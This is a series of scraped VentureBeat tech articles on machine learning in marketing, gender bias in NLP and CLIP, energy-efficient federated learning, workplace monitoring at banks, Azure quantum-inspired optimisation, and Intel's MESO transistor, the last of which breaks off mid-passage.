if ML can be applied to a problem, the following set of questions are useful: Can a human solve the specific task required in less than 2 seconds? (This is a rough estimate; we have not yet reached the point of solving problems more complex than this.) Is it valuable to solve this problem repeatedly at scale (e.g., billions of times incredibly fast)? Is it valuable to do this task repeatedly, robustly, and consistently? Can we measure “success” numerically? If you can answer “yes” to these questions, then you have a problem that is a great fit for applying machine learning. (Interestingly, these are also the kind of tasks that humans are terrible at because we get bored, distracted and tired!) This might appear very limiting, but many problems fit into the “yes” bucket, such as identifying spam emails, detecting fraud, optimizing pricing, and making sense of language. Solving marketers problems with machine learning When it comes to marketing and advertising, there is a whole category of problems that also fit squarely into that “yes” bucket. Detecting audience composition and behavior changes over time, predicting if an ad will lead to a potential customer visiting my site based on the contents of the article they are reading, and tuning thousands of parameters to ensure budgets are spent efficiently and effectively are all such marketing problems. There are also problems that do not fit into this categorization, such as: how do I convey my complex message in a way that cuts through the noise? How do I connect effectively with an audience with whom I am not currently resonating? How do I balance long and short-term objectives? Machine learning is not magic: it can give marketers superhuman capabilities to find patterns in data to deepen our understanding, optimize delivery against well-defined goals, react to changes rapidly and rationally, and execute our ideas predictably, with less friction and more feedback Interacting with customers in real time For marketing, much of the information and patterns that are useful relate to customer behavior. Digital campaigns are markedly less effective when they are unable to respond to changing conditions at the moment. To illustrate, if you are selling gourmet coffee makers, you want to reach the people that are still interested in purchasing one, not those that had been searching online for the past week and purchased one yesterday. Everyone has experienced shopping online for a product, having it arrive, and then having every device and platform they use spam them with the same product repeatedly for the next week. While this may be useful for products that customers generally continue to buy (detergent, toiletries, etc.), most people only need one gourmet coffee maker. Not only does real-time data ensure that campaigns are reaching the right people, but it also allows marketers to respond to changing market conditions. By combining machine learning with real-time data, marketers can see results live, instead of waiting for results at the end of a campaign. This means brands can detect and capitalize on things like a popular, recently released Netflix show or what’s trending on Twitter, or even address the quickly changing dynamics within the supply chain. If there is anything brands have learned over the past couple of years, it’s that world events can impact shopping behaviors and patterns in an instant. While machines can take care of analyzing data around demographics, web browsing behaviors, and past purchases, having the right creative marketer — who can connect current trends to campaign goals and ensure the right questions are being asked of the machines — is what distinguishes a good campaign from a great one. To borrow another great quote, this time from Alan Kay, “Simple things should be simple, complex things should be possible”. In addition to helping us get deeper insight and understanding of audience behavior, great technology should also make it simple for marketers to react to this information by getting new creative ideas live in minutes, not months. Can ML predict the future? Predicting the future is not possible. But machine learning technology combined with real-time data can enable marketers to understand emerging trends and behavioral shifts as they happen and make it easy to react to these changes by getting automatically optimized campaigns live in minutes and seeing if they are working within hours and days. True progress is about learning, and about testing strategies and ideas. The underestimated impact that ML will have on the ad tech industry over the next decade will not be due to AI-generated ideas or reduced dollars spent on operations that will materialize; the big impact will come from shortening the gaps between marketing strategy, insight, idea and execution and from allowing us to understand more deeply and quickly, be more creative, and test ideas more confidently and easily, and measure impact more effectively. This technology — like all other technologies — is not to replace humans, but free us from the repetitive and tedious and empower us to be superhuman. Peter Day is CTO of Quantcast DataDecisionMakers Welcome to the VentureBeat community! DataDecisionMakers is where experts, including the technical people doing data work, can share data-related insights and innovation. If you want to read about cutting-edge ideas and up-to-date information, best practices, and the future of data and data tech, join us at DataDecisionMakers. You might even consider contributing an article of your own! Read More From DataDecisionMakers The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! DataDecisionMakers Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,085
2,020
"We can reduce gender bias in natural-language AI, but it will take a lot more work | VentureBeat"
"https://venturebeat.com/2020/12/06/we-can-reduce-gender-bias-in-natural-language-ai-but-it-will-take-a-lot-more-work"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Guest We can reduce gender bias in natural-language AI, but it will take a lot more work Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. Thanks to breakthroughs in natural language processing ( NLP ), machines can generate increasingly sophisticated representations of words. Every year, research groups release more and more powerful language models — like the recently announced GPT-3, M2M 100, and MT-5 — that are able to write complex essays or translate text into multiple languages with better accuracy than previous iterations. However, since machine learning algorithms are what they eat (in other words, they function based on the training data they ingest), they inevitably end up picking up on human biases that exist in language data itself. This summer, GPT-3 researchers discovered inherent biases within the model’s results related to gender, race, and religion. Gender biases included the relationship between gender and occupation, as well as gendered descriptive words. For example, the algorithm predicted that 83% of 388 occupations were more likely to be associated with a male identifier. Descriptive words related to appearance, such as “beautiful” or “gorgeous” were more likely to be associated with women. When gender (and many other) biases are so rampant in our language and in the language data we have accumulated over time, how do we keep machines from perpetuating them? What is bias in AI? Generally speaking, bias is a prejudice for or against one person or group, typically in a way considered to be unfair. Bias in machine learning is defined as an error from incorrect assumptions in the algorithm or, more commonly, systemic prediction errors that arise from the distribution properties of the data used to train the ML model. In other words, the model consistently makes the same mistakes related to certain groups of individuals. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! In NLP, both kinds of bias are relevant. The pre-existing biases in our society affect the way we speak and write. Written words are ultimately used to train machine learning systems. When we train our models using biased data, it gets incorporated into our models, which preserves and confirms existing biases. This happens because machines consume language differently than humans. Simply put, words are represented by lists of numbers called word embeddings that encode information about the word’s meaning, usage, and other properties. Computers “learn” these values for every word after consuming training data of many millions of lines of text, where words are used in their natural contexts. Since word embeddings are numbers, they can be visualized as coordinates in a plane, and the distance between words — more precisely, the angle between them — is a way of measuring how similar they are semantically. These relationships can be used to generate analogies. Some terms, like king and queen, are inherently gendered. Other terms, such as those related to occupation, should not be intrinsically gendered. However, in the GPT-3 research example cited above, the machine guessed that professions demonstrating higher levels of education were heavily male leaning (such as banker, or professor emeritus), while professions such as midwife, nurse, receptionist, and housekeeper were heavily female leaning. Professions qualified as “competent” were heavily male leaning. Results like this happen again and again within different machine learning models and algorithms, not to single out GPT-3 alone. These are obviously not the ideal outcomes. Machine learning systems are no better than the data they consume. Most people assume that more data yields better-performing models. Often, the best way to get more data is to choose large, web-crawled datasets. Since the internet and other content is made up of real, human language, the data will naturally exhibit the same biases that humans do. Unfortunately, not enough attention is paid to the content within these web-crawled datasets. Reducing AI’s gender bias Not only are some of the analogies generated by machine learning models offensive, they are also inaccurate. If we want machine learning systems to be more accurate and fair, having humans in the loop is one of the best ways to reduce the risk of gender-biased training data. Humans can correct machines’ errors and provide feedback that helps refine algorithms over time. But certainly there are more fundamental steps that machine learning engineers can take to reduce gender bias in NLP systems. One of the most intuitive methods is to modify the training data. If we know our models learn bias from data, perhaps de-biasing data is the best approach. One such technique is “gender-swapping,” where the training data is augmented so that for every gendered sentence, an additional sentence is created, replacing pronouns and gendered words with those of the opposite gender, and substituting names with entity placeholders. For example, “Mary hugged her brother Tom” would also create “NAME-1 hugged his sister NAME-2.” This way, the training data becomes gender-balanced and also does not learn any gender characteristics associated with names. For example, this approach would prevent gendered career analogies given by the model, because it would have seen computer programmers in male and female contexts an equal number of times. It is important to note that this approach is straightforward for English but much more challenging for other languages. For example, in romance languages, such as French, Portuguese, or Spanish, there is no neutral grammatical gender. Adjectives and other modifiers in these languages express gender, as well. As a result, a different approach is required. Another method specific to machine translation that helps translations be more gender-accurate involves adding metadata to the sentences that stores the gender of the subject. For example, while the sentence “You are very nice” is gender-ambiguous in English, if the parallel Portuguese sentence was “Tu és muito simpática,” a tag could be added to the beginning of the English sentence so the model could learn the correct translation. After training, if someone requests a translation and supplies the desired gender tag, the model should return the correct one and not just the majority gender. If the Hungarian-English system was trained in this way, we could ask it to translate “Ő egy orvos” and receive the translation “She is a doctor,” or “Ő egy nővér” and “He is a nurse.” To perform this at scale, an additional model would need to be trained that classifies the gender of a sentence and uses it to tag the sentences, adding a layer of complexity. While these methods may reduce gender bias in NLP models, they are time-consuming to implement. In addition they require linguistic information that might not be readily available or possible to get. Thankfully, this topic is becoming a fast-growing area of research. For example, in 2018 Google announced that Google Translate would return translations of single words from four languages to English in both the feminine and masculine form. Researchers from Bloomberg have recently collaborated on best-practices for human annotation of language-based models. Many research organizations, like the Brookings Institute, are focused on ways to reduce consumer harms that come from biased algorithms, most recently with voice and chatbots. Everything from hiring practices, to loan applications, to the criminal justice system can be affected by biased algorithms. Despite these advances, there are more systemic problems that come from a lack of diversity in AI and tech as a whole. Overall, equal gender representation would increase the tech industry’s awareness of bias issues. If AI systems are built by everyone, they would be more unbiased and inclusive of everyone, as well. Alon Lavie is VP of Language Technologies at Unbabel. Christine Maroti is AI Research Engineer at Unbabel. VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,086
2,021
"Audit finds gender and age bias in OpenAI's CLIP model | VentureBeat"
"https://venturebeat.com/2021/08/10/audit-finds-gender-and-age-bias-in-openais-clip-model"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Audit finds gender and age bias in OpenAI’s CLIP model Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. In January, OpenAI released Contrastive Language-Image Pre-training (CLIP) , an AI model trained to recognize a range of visual concepts in images and associate them with their names. CLIP performs quite well on classification tasks — for instance, it can caption an image of a dog “a photo of a dog.” But according to an OpenAI audit conducted with Jack Clark, OpenAI’s former policy director, CLIP is susceptible to biases that could have implications for people who use — and interact with — the model. Prejudices often make their way into the data used to train AI systems, amplifying stereotypes and leading to harmful consequences. Research has shown that state-of-the-art image-classifying AI models trained on ImageNet , a popular dataset containing photos scraped from the internet, automatically learn humanlike biases about race, gender, weight, and more. Countless studies have demonstrated that facial recognition is susceptible to bias. It’s even been shown that prejudices can creep into the AI tools used to create art, seeding false perceptions about social, cultural, and political aspects of the past and misconstruing important historical events. Addressing biases in models like CLIP is critical as computer vision makes its way into retail, health care, manufacturing, industrial, and other business segments. The computer vision market is anticipated to be worth $21.17 billion by 2028. But biased systems deployed on cameras to prevent shoplifting, for instance, could misidentify darker-skinned faces more frequently than lighter-skinned faces, leading to false arrests or mistreatment. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! CLIP and bias As the study’s coauthors explain, CLIP is an AI system that learns visual concepts from natural language supervision. Supervised learning is defined by its use of labeled datasets to train algorithms to classify data and predict outcomes. During the training phase, CLIP is fed with labeled datasets that tell it which output is related to each specific input value. The supervised learning process progresses by constantly measuring the resulting outputs and fine-tuning the system to get closer to the target accuracy. CLIP allows developers to specify their own categories for image classification in natural language. For example, they might choose to classify images in animal classes like “dog,” “cat,” and “fish.” Then, upon seeing it work well, they might add finer categorization such as “shark” and “haddock.” Customization is one of CLIP’s strengths — but also a potential weakness. Because any developer can define a category to yield some result, a poorly defined class can result in biased outputs. The coauthors carried out an experiment in which CLIP was tasked with classifying 10,000 images from FairFace, a collection of over 100,000 photos showing White, Black, Indian, East Asian, Southeast Asian, Middle Eastern, and Latinx people. With the goal of checking for biases in the model that might certain demographic groups, the coauthors added “animal,” “gorilla,” “chimpanzee,” “orangutan,” “thief,” “criminal,” and “suspicious person” to the existing categories in FairFace. The coauthors found that CLIP misclassified 4.9% of the images into one of the non-human categories they added (e.g., “animal,” “gorilla,” “chimpanzee,” “orangutan”). Out of these, photos of Black people had the highest misclassification rate at roughly 14%, followed by people 20 years old or younger of all races. Moreover, 16.5% of men and 9.8% of women were misclassified into classes related to crime, like “thief” “suspicious person,” and “criminal” — with younger people (again, under the age of 20) more likely to fall under crime-related classes (18%) compared with people in other age ranges (12% for people aged 20-60 and 0% for people over 70). In subsequent tests, the coauthors tested CLIP on photos of female and male members of the U.S. Congress. At a higher confidence threshold, CLIP labeled people “lawmaker” and “legislator” across genders. But at lower thresholds, terms like “nanny” and “housekeeper” began appearing for women and “prisoner” and “mobster” for men. CLIP also disproportionately attached labels to do with hair and appearance to women, for example “brown hair” and “blonde.” And the model almost exclusively associated “high-status” occupation labels with men, like “executive,” “doctor,” and”military person.” Paths forward The coauthors say their analysis shows that CLIP inherits many gender biases, raising questions about what sufficiently safe behavior may look like for such models. “When sending models into deployment, simply calling the model that achieves higher accuracy on a chosen capability evaluation a ‘better’ model is inaccurate — and potentially dangerously so. We need to expand our definitions of ‘better’ models to also include their possible downstream impacts, uses, [and more],” they wrote. In their report, the coauthors recommend “community exploration” to further characterize models like CLIP and develop evaluations to assess their capabilities, biases, and potential for misuse. This could help increase the likelihood models are used beneficially and shed light on the gap between models with superior performance and those with benefit, the coauthors say. “These results add evidence to the growing body of work calling for a change in the notion of a ‘better’ model — to move beyond simply looking at higher accuracy at task-oriented capability evaluations and toward a broader ‘better’ that takes into account deployment-critical features, such as different use contexts and people who interact with the model, when thinking about model deployment,” the report reads. VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,087
2,021
"Proposed framework could reduce energy consumption of federated learning | VentureBeat"
"https://venturebeat.com/2021/02/23/proposed-framework-could-reduce-energy-consumption-of-federated-learning"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Proposed framework could reduce energy consumption of federated learning Share on Facebook Share on X Share on LinkedIn Are you looking to showcase your brand in front of the brightest minds of the gaming industry? Consider getting a custom GamesBeat sponsorship. Learn more. Modern machine learning systems consume massive amounts of energy. In fact, it’s estimated that training a large model can generate as much carbon dioxide as the total lifetime of five cars. The impact could worsen with the emergence of machine learning in distributed and federated learning settings, where billions of devices are expected to train machine learning models on a regular basis. In an effort to lesson the impact, researchers at the University of California, Riverside and Ohio State University developed a federated learning framework optimized for networks with severe power constraints. They claim it’s both scalable and practical in that it can be applied to a range of machine learning settings in networked environments, and that it delivers “significant” performance improvements. The effects of AI and machine learning model training on the environment are increasingly coming to light. Ex-Google AI ethicist Timnit Gebru recently coauthored a paper on large language models that discussed urgent risks, including carbon footprint. And in June 2020, researchers at the University of Massachusetts at Amherst released a report estimating that the amount of power required for training and searching a certain model involves the emissions of roughly 626,000 pounds of carbon dioxide , equivalent to nearly 5 times the lifetime emissions of the average U.S. car. In machine learning, federated learning entails training algorithms across client devices that hold data samples without exchanging those samples. A centralized server might be used to orchestrate rounds of training for the algorithm and act as a reference clock, or the arrangement might be peer-to-peer. Regardless, local algorithms are trained on local data samples and the weights — the learnable parameters of the algorithms — are exchanged between the algorithms at some frequency to generate a global model. Preliminary studies have shown this setup can lead to lowered carbon emissions compared with traditional learning. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! In designing their framework, the researchers of this new paper assumed that clients have intermittent power and can participate in the training process only when they have power available. Their solution consists of three components: (1) client scheduling, (2) local training at the clients, and (3) model updates at the server. Client scheduling is performed locally such that each client decides whether to participate in training based on an estimation of available power. During the local training phase, clients that choose to participate in training update the global model using their local datasets and send their updates to the server. Upon receiving the local updates, the server updates the global model for the next round of training. Across several experiments, the researchers compared the performance of their framework with benchmark conventional federated learning settings. The first benchmark was a scenario in which federated learning clients participated in training as soon as they had enough power. The second benchmark, meanwhile, dealt with a server that waited for clients to have enough power to participate in training before initiating a training round. The researchers claim that their framework significantly outperformed the two benchmarks in terms of accuracy. They hope it serves as a first step toward sustainable federated learning techniques and opens up research directions in building large-scale machine learning training systems with minimal environmental footprints. VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,088
2,021
"As employees return to the office, banks explore surveillance tech | VentureBeat"
"https://venturebeat.com/2021/05/21/banks-explore-sensors-cameras-monitoring-tech-as-workers-return-to-office"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages As employees return to the office, banks explore surveillance tech Share on Facebook Share on X Share on LinkedIn VergeSense's office with sensors installed. Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. ( Reuters ) — Reservation systems for seats. Algorithms that say whether a location is crowded or not. Cameras to show what’s happening in real-time. Trackers that let others know you are there. Technology that has swept the world for convenience, curiosity, and accountability is arriving at workstations of U.S. bank employees, as they prepare to return to offices in coming months because of the pandemic easing, industry sources and outside vendors said. Banks including JPMorgan Chase , Goldman Sachs Group, Citigroup, Deutsche Bank AG and HSBC Holdings plan to have workers commute to buildings in New York and other U.S. cities as soon as this month, after more than a year of largely work-from-home situations. But not everyone can return at once: banks will have to extend practices like those used for small teams of traders during the pandemic. Shifting rotations of people will pass through giant buildings on different days, without clustering in the same areas on the same floors, to avoid spreading COVID-19. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! Some of the banks are implementing systems where employees will book “hot seats” on particular days and be monitored while they are sitting at them, sources said. In some buildings, that could mean cameras that monitor a room’s occupancy level and even sensors that tell building management whether someone is sitting at a desk. “That feels a little personal,” one bank employee said about desk sensors. The comment reflects a sentiment that some banks could face as they bring in tech that monitors employees more closely after an unprecedented period of working from afar: they are okay booking dinner reservations online, sharing locations with friends, live-streaming videos or wearing activity trackers for their own health, but not necessarily okay with having their employers knowing when they are seated at a desk. Employees will need to get over these hang-ups because the technology is necessary for safety and saves companies money, industry sources and consultants said. “We have to be more mindful about how space is being used and when it is being used,” said Neil Murray, CEO of corporate solutions at JLL, which manages offices for JPMorgan, Morgan Stanley, Goldman Sachs and others. Murray said public health initiatives like contact-tracing have forced us to make certain concessions. “There is an element of having to watch interactions more closely. At the same we have to be respectful of individual privacy.” JLL would not comment on specific clients, and Reuters could not independently determine which banks were using the technology. Searching for ‘optimum rotation’ Staff returning to JPMorgan’s Manhattan headquarters will soon have a new app that uses algorithms and artificial intelligence to book seats. It is part of an “optimum rotation” plan, Daniel Pinto, JPMorgan’s co-president and chief operating officer said recently. That means getting the right people together on the right days for in-office collaboration. HSBC and Deutsche Bank also plan to launch reservation apps and online systems. While all three banks are still working out the details, apps like these can use card-swipes at security turnstiles to identify patterns and suggest when someone should book a desk to meet teammates. Some companies in JLL’s portfolio are taking it a step further and linking their reservation systems to building cameras, which count bodies in a room, and desk sensors, which record when a seat is occupied, Murray said. In addition to flagging when a room may be near its 50% capacity limit, the data can tell companies when an office, or whole floor, is empty. That helps determine when to turn off lights, cancel janitorial services or downsize office space. JPMorgan expects to need just 60 seats for every 100 employees, on average, Chief Executive Jamie Dimon wrote in his April shareholder letter. “This will significantly reduce our need for real estate,” Dimon wrote. What about lunch? A not insignificant number of bank employees have resisted going back to work in the office — whether because of COVID-19 concerns, because they moved out of big cities during the pandemic, or because they simply prefer more flexible work arrangements. On the flip side, some junior investment bankers have complained about working from home without the hands-on guidance and camaraderie they would get in person, and without perks like free meals for late-night duties. Banks will have to balance those dynamics to get their workforce back to the office, and some are leaning on the idea of free and subsidized food. Credit Suisse, Barclays and others are using Sharebite, which coordinates orders from restaurants and directs delivery drivers to a building’s service entrance. Meals are then sent to a common space where employees collect them. The service has been popular at investment banks looking for contactless food delivery, said Sharebite CEO Dilip Rao. “When you offer people food it brings people back to the office,” Rao said. “They feel safe. They feel fed.” VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,089
2,021
"Azure Quantum drives data storage improvements | VentureBeat"
"https://venturebeat.com/2021/11/15/azure-quantum-drives-data-storage-improvements"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Azure Quantum drives data storage improvements Share on Facebook Share on X Share on LinkedIn As organizations continue to struggle to maximize storage utilization and optimize analyzing massive amounts of data, Microsoft is upping its focus on the “high promise of quantum technology,” Daniel Stocker, program manager, Azure Quantum technology, told VentureBeat. With those data sizes growing and complexity increasing, Azure Quantum built a QIO solution for Azure Storage that’s designed to keep the load on storage clusters uniform while reducing the amount of data that needs to move. [ Related : Multiverse Computing utilizes quantum tools for finance apps ] Azure Quantum has been supporting the Azure Storage team this year with a quantum-inspired optimization solution, according to Microsoft. Stocker said, “quantum-inspired” refers to running quantum algorithms on classical systems while allowing developers to be prepared for further acceleration when “scaled quantum hardware is available at scale. We’re not there yet,” he said. Moving data intelligently The quantum solution has helped Azure storage team increase capacity, efficiency, and predictability, which helps customers get high-quality service from Azure Storage. “We optimize every move we make, and we make them intelligently,” Stocker said. [ Related : Gartner advises tech leaders to prepare for action as quantum computing spreads ] Stocker said Azure offerings are available for both quantum-inspired and quantum hardware systems on a pay-as-you-go model. Developers can use Python or Microsoft Q#, Microsoft’s open-source language for developing quantum algorithms. Python is the language of choice for developing quantum algorithms, while Q#, Stocker, said “will future proof Azure Storage long-term. “ Microsoft points to three customers that it says has seen significant results from Azure Quantum. Trimble uses Azure Quantum to find the most efficient routes for a fleet of vehicles, looking to ensure fewer trucks run empty and maximizing their operating load for each trip. OTI Lumionics is accelerating materials design with quantum-inspired optimization solutions designed to simulate organic materials used in OLED displays for the design of next generation consumer electronics. Ford partnered with Azure Quantum to build a QIO-based traffic optimization solution that’s designed to reduce both traffic congestion and travel time by delivering optimized routing to thousands of drivers simultaneously. Preliminary studies show more than a 70 percent decrease in congestion, as well as an 8 percent reduction of average travel time, according to the automaker. VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,090
2,022
"Intel looks beyond CMOS to MESO | VentureBeat"
"https://venturebeat.com/2022/01/14/intel-looks-beyond-cmos-to-meso"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Intel looks beyond CMOS to MESO Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. At the 2021 IEEE International Electron Devices Meeting (IEDM), Intel demonstrated for the first time a functional MESO (Magneto-Electric Spin-Orbit) transistor. MESO is what’s called a “beyond-CMOS” device. That is, it represents a fundamental new way of building a transistor (and hence computers) and uses room-temperature quantum materials. MESO could be 10 to 30 times more efficient than existing transistors and could help spur AI efforts across a variety of industries. Although still in the research phase, MESO would represent the biggest advance in computing since the introduction of the transistor, if it reaches commercialization, and would likely lead to revisions in electrical engineering courses and textbooks. Intel’s prior theoretical research had shown that MESO could offer significant advances over conventional transistors in the energy consumption and chip area. MESO could allow circuits to run at just 100mV, and would be especially promising for application in AI chips. In the more recent demonstration, Intel showed the potential of the new transistor. In 2021, Intel laid out its process roadmap through 2025, which it will also use to build its new Intel Foundry Service business. Most noteworthy from that roadmap is that, in 2024, Intel will make another big (but more evolutionary) change to the transistor with the introduction of RibbonFET and PowerVia. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! Although MESO remains a future technology, it’s significant because it’s the first transistor (out of dozens of alternatives that have been researched) that may be capable of replacing – or at least augmenting – conventional semiconductors. The next few sections will dive into the physics behind MESO. How MESO goes beyond CMOS Although computing \existed well before the invention of transistors (through devices such as vacuum tubes), it’s only been since the transistor that computing has started to advance exponentially. The continued miniaturization of these devices has led to a trend widely known as Moore’s Law. Besides the fact that transistors lend themselves to scaling, what fundamentally makes them so successful is that they provide circuit designers with an on-off switch that also provides a gain. Furthermore, transistor fabrication is based on silicon, which is a semiconductor whose properties can be controlled through doping. That is, its conductivity can be precisely determined by inserting (doping) silicon with impurities. Through the years, especially as the transistor started to enter nanoscale dimensions, it has already seen many enhancements to improve speed, or to reduce power consumption or leakage. One of the biggest of these improvements was to change the transistor from a planar device to a 3D FinFET (where the fin extends out of the initial silicon wafer). In the next several years, this structure will be further improved by the gate-all-around transistor, which goes by various names such as the RibbonFET (Intel) or MCBFET (Samsung). However, despite these changes, the architecture of a MOSFET has fundamentally remained the same: the current through the channel of the transistor is controlled by applying a voltage to the gate. The gate itself is insulated from the conducting channel, so current only flows from input to output. The input and output contacts are known as the source and drain. Over time, various alternative structures have been proposed. These seek to accomplish the same on-off switch characteristics as a MOSFET, but based on other physical properties and mechanisms. From that view, the MOSFET can be classified as a charge-based, electronic device: its working is based on electronic (electrostatic) properties. Also in the charge-based category, another device that has been researched is the tunnel FET, which uses the quantum mechanical property of tunneling. Other device types include orbitronics, magneto-electronics, and spintronics. Are these kinds of devices are just curiosities for physicists and engineers to research or are some of these are capable of replacing silicon in high-volume manufacturing. The answer relies on the fundamental working principles of semiconductors, which impose a fundamental limit. Remember that as an on-off switch to function properly one needs to obtain a significant difference in current between the on- and off-states. As mentioned above, this is controlled by applying a voltage to the gate. However, the current through a transistor doesn’t change arbitrarily when a voltage is applied. Ultimately, a semiconductor is limited by the laws of statistics and thermodynamics: given the thermal energy available to electrons at room temperature, there is a fundamental limit to how much the current through a transistor can decrease as the voltage is decreased. More specifically, the laws of thermodynamics impose a distribution in the energy available to electrons at a given temperature (since temperature by definition refers only to their average energy). The “tail” of this distribution 